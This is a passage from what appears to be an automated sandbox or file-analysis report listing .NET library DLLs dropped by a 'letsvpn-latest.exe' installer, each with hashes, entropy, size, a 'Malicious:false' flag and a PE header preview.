                                                                                                                                                                                                  SHA-256:491D8D66F1C221AFC45A78C722E440D1954E21FB0C7DF124D172D0E8D4A1EAC7
                                                                                                                                                                                                  SHA-512:38D5B7AB41341237BB8C3014083443C934DF9952C883D46F26B9A52A8C84EE89DE128887B4EF833E217BE9A022DDE8AC2F4691EEBB02324B2D34059EA6695E23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................=....@..................................(..O....@.................. ....`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.958092237087259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+AlcWHaWZhqWOHlLf2KQcvBZ9ooS+ShjmM6IGBkSse:P9zq3b2KZBZ9S+ST6nkne
                                                                                                                                                                                                  MD5:DF525B438444B76BCB156B66E7161E84
                                                                                                                                                                                                  SHA1:3DC313D7F3CC9CAF2E07B958BFDCD00DCB0DCF37
                                                                                                                                                                                                  SHA-256:3AD983B3F53F29734D1A7BFA34DF9D12890641AE701D7491380BA3F96160EC29
                                                                                                                                                                                                  SHA-512:96BF743CFA0A5E128213BF52B61F818ABD76AD48C9C23E042BF816BF2884F3203FB6678245CA21CE6D9B9B0D5648EDB239E7A5C19B87E1E84283B0738B751575
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...................................@..................................(..O....@.. ............... ....`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.891837867115112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l8IZnWlNWxhqWOHlLf2KQcvBZ926lS+ShjmM6IGBkSQu:GUywq3b2KZBZXS+ST6nkTu
                                                                                                                                                                                                  MD5:849EF7F81E30B7588D0DE5E5D6BD8E40
                                                                                                                                                                                                  SHA1:F9D68F2AFEBCF43B9F70040CB312FEEC2C1DA8A6
                                                                                                                                                                                                  SHA-256:63B6ADB455FADEB5DCD50A54013EFB4FF38229FB7880876E808A682811B02C49
                                                                                                                                                                                                  SHA-512:D00A7E17D6CF293229CF93198D7C5607FBB47BA99A75AEBA1761057549F0B81E316B8B7E319FFBA9B421E2837261D79355947DFEACEC9FC1BE4C387FF714B7B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ...................................@..................................)..O....@..P............... ....`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27168
                                                                                                                                                                                                  Entropy (8bit):6.589374706387424
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:qQq33333333kX+TBi8Bq3b2KZBZUS+ST6nkz:tu1i803qKi/mZ
                                                                                                                                                                                                  MD5:BFC312F081410FB6DA38D96C81F1DBA0
                                                                                                                                                                                                  SHA1:AB97835A609001CE1A1A423E60C92F50DFB30E2F
                                                                                                                                                                                                  SHA-256:2164BC42B0909DF2674F4F301C24B865FDF3328D6DF4A11E34C29A2D13B16F51
                                                                                                                                                                                                  SHA-512:94D3FE930981A7E77BC116178F5328A1F666929FB9E6800C5AC8B2870CFCDD52E40AC92D260F1C5197065ADE6DFACE2FC5E9F591153AFC77642693AC4A491753
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ...............................I....@..................................L..O....`..x............<.. ...........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55840
                                                                                                                                                                                                  Entropy (8bit):5.935591964243442
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:fJbgUxvrIn01EkO/69KzwmOiGeCcSP8UIre3qK6/mj:f1xvrInsEkO/AKzwm3C0UOe2/M
                                                                                                                                                                                                  MD5:321AA362C269B7998E487EABBA76DF89
                                                                                                                                                                                                  SHA1:59717CD20D72BD4067D988BD098667AD328CA25F
                                                                                                                                                                                                  SHA-256:AF6EFED5F99926E2948F49CDA00D6EF52FEE0BD6006A5FF292A8D165C6C5054A
                                                                                                                                                                                                  SHA-512:8F73EED30895D32724B6731C1031632F070C8E695CEEA4644EAD4F0CB9D546AF7CBA26EC806033A2BC4661160123D4F86EB8A7B21767A7C716E91E7192758799
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............n.... ........... ..............................kH....`.....................................O....................... ...........8...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........)...\...............6...........................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9586207641045785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G28YFlXulWY/WJhqWOHlLf2KQcvBZ9mH6S+ShjmM6IGBkSB7IT:G0qCq3b2KZBZMaS+ST6nkhT
                                                                                                                                                                                                  MD5:2546F1626A6DA255A1BA53361C9BACAB
                                                                                                                                                                                                  SHA1:5F2BFC8C263EC4C16EECE35AF449BF796A38EC09
                                                                                                                                                                                                  SHA-256:4EF0AEE89AFE95C84FD39CD5E6B3C0615BEC80DD9F2A3E032431664054199B43
                                                                                                                                                                                                  SHA-512:D6F937F3617E365E697A42624D25608F151FE1838C01EBCDEDFAA98F3318939FB6AE61A954877FDCD18999E7F786E0C8875ACDA856E91B201D21E6C2FC101746
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ............... ....`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.846896849834963
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:duMLcdQ5MW9MWWhqWOHlLf2KQcvBZ9Szk6hFWS+ShjmM6IGBkSb:8OcSp8q3b2KZBZV6SS+ST6nk4
                                                                                                                                                                                                  MD5:6D457DEF3C837293F37CA120532A14DB
                                                                                                                                                                                                  SHA1:8884226BCB76B3335EA1DDCC37C93304B9D43A2E
                                                                                                                                                                                                  SHA-256:DACB18FB653B44FFF1822A7048DECF50A45C009F86D5730646B168E06D8E3707
                                                                                                                                                                                                  SHA-512:1B43B755F1A9A374329E0BA9C7CAC46E1EA25768284E38A8D5094F0416FEBFE919C02D37AD4FBF2D21328A8592B159807931A683869BC519EEBE86D4E36A5C3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ....................................@..................................+..O....@.................. ....`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.918920376522975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2eZ7RqXWDRqlRqj0RqFW1hqWOHlLf2KQcvBZ97dPFHhS+ShjmM6IGBkSI:X9qKqjqjuqMq3b2KZBZv3S+ST6nkH
                                                                                                                                                                                                  MD5:BA85D809EC7A22051C54AF57D0AD7C6E
                                                                                                                                                                                                  SHA1:3A6D7B63940F0BC004C119EE802B2ABC0EF6D131
                                                                                                                                                                                                  SHA-256:C22CEC6D7BB7133464E72DD27F86C863717FDBB20B03B7A6992F84C41C9B0664
                                                                                                                                                                                                  SHA-512:09229B959088298EE827D9C6A0360C843B1EEF9FA9BC197582DD13988A7EFC86AB00DE0EC74B3A1E659968094FB97D9F61B880C36C17AC097B106A9816AE4F0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ...............................?....@.................................X*..O....@..P............... ....`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.733022853099171
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W4hqWOHlLf2KQcvBZ91fS+ShO:5vMhF2SzNzwu/Nljuzq3b2KZBZnS+ST8
                                                                                                                                                                                                  MD5:374B265EEB90FDED2AB11EE7543E2A0B
                                                                                                                                                                                                  SHA1:EC1EE2B9AB15AC348ABF1930ECCD677C2026AC33
                                                                                                                                                                                                  SHA-256:551DC892D640C22AD5D4A31991E053C753D59DFED8E9BA492F360FB8487BE70B
                                                                                                                                                                                                  SHA-512:D206BB30BB66CA6CE206B540791EB1BEC94B47F1A9E19F610DF5F207690E2E3D252F98571C743A2A72DC7C49AA5A6A5D56FBEC051B2E6E88AA36698B530145B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ....................................@.................................a6..O....@...............&.. ....`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o....*"..o....*..o....*"..o....*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*...0..K........-.r1..ps....z. ...@3.(....*. ....3.(....*. ...._,.(....rI..ps..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9967929370197135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:QZ4RLWdRfRJ0RZWJhqWOHlLf2KQcvBZ9k1S+ShjmM6IGBkSHVz:QZK0pJucq3b2KZBZMS+ST6nkkN
                                                                                                                                                                                                  MD5:B4DE713393E243E6B74ABA592A87BC70
                                                                                                                                                                                                  SHA1:D7B85D8EC0E3A2AE2AD7548E2AEFBC0FBEA0B3D3
                                                                                                                                                                                                  SHA-256:22B10C588D9D3BFD3F14551E26891880C3F10D30D9AE24907DF81155843619BF
                                                                                                                                                                                                  SHA-512:4968FD0B2DA1DC05D9B5ADB08E2DF79FDD232212BA59D0726FB1FE2C0A4E72E9DA83E2986A60E6CE20A05B4BFBB061A72F2E4DD4F6B6A6BB6AFDCED1845B4E53
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@.................. ....`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.908181305951868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gYWsmWShqWOHlLf2KQcvBZ9dWS+ShjmM6IGBkSV:g2uq3b2KZBZCS+ST6nkq
                                                                                                                                                                                                  MD5:07F83DA30A4155730B722D028D2E7A5D
                                                                                                                                                                                                  SHA1:DA2085605B64741D85F5EDEF8D4E45C3D0A24AEA
                                                                                                                                                                                                  SHA-256:ACA4744E64C8EDAB708CD3193B4315C937CEEE3FC82CC7C35EF195E229EB8DFC
                                                                                                                                                                                                  SHA-512:0642BDF49C4CC0EA90E79770B64D5007A3CE8A37D9F7A69E1AD7522C43F0D7DFEEC365B1D525470442A6A24000F170F6BC9B1DBAA0FD9BE192B15F7ABDF6D3C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................h....@..................................'..O....@..@............... ....`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):106528
                                                                                                                                                                                                  Entropy (8bit):6.4118107859279405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Jvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXv3qKe/mvW:Fgk1tiLMYiDFvxqrWDWNoJXv6/AW
                                                                                                                                                                                                  MD5:CF91C18B32DA597C9E15105999487628
                                                                                                                                                                                                  SHA1:C863AC3BAB1FB4EB227E5722D0455F9A3B131B35
                                                                                                                                                                                                  SHA-256:4B34A0DEB1F888A8B48B39C6B4073B197344FB9B56DA1887767569937AA3B488
                                                                                                                                                                                                  SHA-512:7518606F44E43108C5666C09845EC5B5FE99BC84FFFD3DC6A830B840DBA74950FFD73609DAC0F6AE61746EFD691866B805A88B9B30968C9E725C39434D7A622F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ..............................v.....@.................................5W..O....................r.. ............V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.48384033148274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+CN9VYp/OiRcnZIfk8P/q3b2KZBZQCS+ST6nkK:+Q9ycnn0S3qKP/mc
                                                                                                                                                                                                  MD5:F41DE27679C17CAA34164449186B0D6C
                                                                                                                                                                                                  SHA1:5D911884D1D162BEAD6D5A3921620799D8A4A0B8
                                                                                                                                                                                                  SHA-256:A48D066FA2F1861EB5218A2149FF99DE13CC431699CCC5B476A9E3C270F9B7B9
                                                                                                                                                                                                  SHA-512:92C64376C72BE45DA44E29F2638BC69361D9C3DA7079CAFF3924DBD106E35EE1DF4D833F94876F2E17A8904544F4A7D30E707529B67454E7DA5166492F0ACB34
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._............" ..0..B...........`... ........... ....................................`.................................t`..O....................L.. ...........l_..T............................................ ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H........&..t)...........P.......^........................................(....*^.(.......(...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.965595445677437
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:IKcuz1W1cWthqWOHlLf2KQcvBZ9KOVS+ShjmM6IGBkSq9:Iu81q3b2KZBZ3VS+ST6nkz
                                                                                                                                                                                                  MD5:F39321A5CFD4B2B4DF5B7297002CE169
                                                                                                                                                                                                  SHA1:9E9B762DE62DCE2854455BC9679BAC99C542223B
                                                                                                                                                                                                  SHA-256:7CD078C1EA5D6FD8225084858E2D09F9F6F4DEC433A8930ACBCD2C343D2DAD12
                                                                                                                                                                                                  SHA-512:0649CFAB684C6BC7FDD392033C0DA94D7646ABF9853BFBBBF1CCCD840A98996AB44E4375DF460522A4343A0B5AD30FB9FA93504F75FFEB5DBF2377AF76E9BDAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P............... ....`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969722484889954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G+SWikWghqWOHlLf2KQcvBZ9e+dS+ShjmM6IGBkStci5:G+eKq3b2KZBZDdS+ST6nkI
                                                                                                                                                                                                  MD5:F934333E05C58E175207663C777901CC
                                                                                                                                                                                                  SHA1:2224BF0028BD1F061823F9730ACB82EF91A59D30
                                                                                                                                                                                                  SHA-256:26033A1C20A6BC7C8C69DE577B9F3B47249F6EE7B28747A972E160810E4A10CA
                                                                                                                                                                                                  SHA-512:799B511DB5784587B67A1551CF1B24A9F8DC37AD2D0D1378D0A89241F44821ED3F47E22118EE9427EF5E766F79F64C41C64F6C43F1F60FC58D7669E2738EF59A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................b....@..................................(..O....@..P............... ....`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005950112883477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:piAWzgWj6hqWOHlLf2KQcvBZ9JOkXS+ShjmM6IGBkSF8b:wtkq3b2KZBZukS+ST6nkIU
                                                                                                                                                                                                  MD5:DDE1CE18B4DB03BE26C9DC5D1364B9ED
                                                                                                                                                                                                  SHA1:CA068FE5A6187CED9DC64C2F861D405A78D498BA
                                                                                                                                                                                                  SHA-256:67908E6B6AEC9096E22708584061BCE00FC0470EE8BE85754533F32631C49172
                                                                                                                                                                                                  SHA-512:C28EB8E74C6A730B94FEF3667EDFEB37C22F2B307882589020A33B290ED3BF35CC120677A6D7AA1FD27F3380381651A4948B160C474C473F4C8C0B62A6281F37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
